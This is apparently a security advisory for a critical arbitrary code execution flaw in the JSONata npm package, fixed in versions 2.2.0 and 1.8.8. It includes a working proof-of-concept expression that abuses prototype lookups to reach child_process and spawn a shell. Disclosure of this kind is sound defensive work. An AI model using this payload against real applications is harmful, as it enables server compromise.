GHSA-8gq3-vp5j-2grpCritical

JSONata: Arbitrary Code Execution via crafted JSONata expressions

Published
August 21, 2026
Last Modified
August 21, 2026

🔗 CVE IDs covered (1)

📋 Description

Impact

Before JSONata 2.2.0 and 1.8.8 it was possible to execute arbitrary code with crafted expressions, due to a missing hasOwnProperty check in the lookup function: https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705

This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the 2.2.0 release, and ported in the 1.8.8 release.

PoC

import jsonata from "jsonata";

const expression = jsonata(`
(
   __lookupSetter__('__proto__')(constructor);
   __defineGetter__('l', constructor("return
process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'}).toString()"));
   valueOf().l
)
`);

await expression.evaluate({});

🎯 Affected products2

  • npm/jsonata:<= 1.8.7
  • npm/jsonata:>= 2.0.0, < 2.2.0

🔗 References (7)